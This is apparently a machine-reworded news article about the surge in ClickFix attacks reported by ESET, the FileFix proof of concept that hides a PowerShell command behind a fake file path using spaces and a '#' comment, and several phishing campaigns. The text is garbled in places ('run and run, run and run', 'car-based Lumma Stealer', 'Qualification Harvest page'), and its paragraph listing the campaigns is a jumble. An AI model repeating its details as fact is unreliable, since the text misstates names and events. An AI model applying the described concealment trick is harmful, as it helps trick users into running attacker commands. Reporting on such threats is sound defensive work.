According to ESET data, ClickFix social engineering tactics as initial access vectors using fake capture validation increased by 517% between the second half of 2024 and the first half of this year.
“The list of threats led by Clickfix attacks grows day by day, including Infostealers, Ransomware, Remot Access Trojans, Cryptominers, exploitation Tools, and even custom malware from nation-state parallel threat actors,” said Director of ESET’s Threat Prevention Lab.
Clickfix employs fake error messages or Captcha validation checks to deceive victims and paste malicious scripts into a Windows Run dialog or Apple MacOS terminal app to run and run, run and run.
Slovak cybersecurity company said the most detections of Clickfix are concentrated in Japan, Peru, Poland, Spain and Slovakia.
The prevalence and effectiveness of this attack method led to ad builders for threat actors who provide Clickfix-Weaponized Landing Pages to other attackers, ESET added.
From Clickfix to FileFix
This development involves security researcher MRD0X demonstrating a proof of concept (POC) to replace FileFix named ClickFix, which means copying and pasting the file path to the user and pasting it into Windows File Explorer.
This technique involves achieving essentially the same as Clickfix, but is achieved in a different way by combining the functionality of File Explorer, which uses the file upload feature of a web browser to execute operating system commands via the address bar.
In attack scenarios devised by researchers, threat actors may devise phishing pages. Instead of displaying fake Captcha checks on future targets, the phishing page may present a message that says that the document will be shared and that you need to copy and paste the file path in the address bar by pressing Ctrl+L.
The phishing page also includes the notable “Open File Explorer” that opens File Explorer when clicked and copies malicious PowerShell commands to the user’s clipboard. So, if the victim pastes the “file path”, the attacker’s command will be executed instead.
This is accomplished by changing the copied file path and prep the PowerShell command. It then adds space to hide space from view and pound sign (“#”) and treats fake file paths as comments.
“In addition, the PowerShell command concatenates the dummy file path after the comment to hide the command and display the file path,” MRD0X said.
There are plenty of fishing campaigns
The surge in Clickfix campaigns is also consistent with the discoveries of various phishing campaigns.
Leverage the .gov domain to send phishing emails pose as unpaid tolls and send fake pages designed to use fake pages (LLDS) designed to collect personal and financial information. The shortcut (LNK) file in ZIP Archives launches the PowerShell code responsible for deploying Remcos Rat employment lures. This alerts users that their mailbox is almost full and they need to “clear” them by clicking the button embedded in the message, and that they need to take users to an IPF-hosted phishing page that steals users’ emails. Interestingly, the email also includes RAR archive attachments that, when extracted and executed, drop XWorm malware. Includes a URL that can be used as a PDF document. This contains another URL to drop the ZIP archive. This includes the executable file responsible for starting the car-based Lumma Stealer. Redirect users to the Qualification Harvest page hosted on *.sharepoint to redirect users using SharePoint-themed emails that redirect SMS messages and recipients regarding unpaid toll violations to a deceptive site that harvests personal information and credit card details[.]com “Siphon user’s Microsoft account password is the Siphon user’s domain.
“Emails containing SharePoint links are less likely to be flagged as malicious or phishing by EDR or antivirus software. Users tend to believe that Microsoft links are inherently safe,” CyberProof said.
“Because phishing pages are hosted in SharePoint, they are often dynamic and accessible from a specific link for a limited time, making it difficult to detect automatic crawlers, scanners and sandboxes.”
Source link
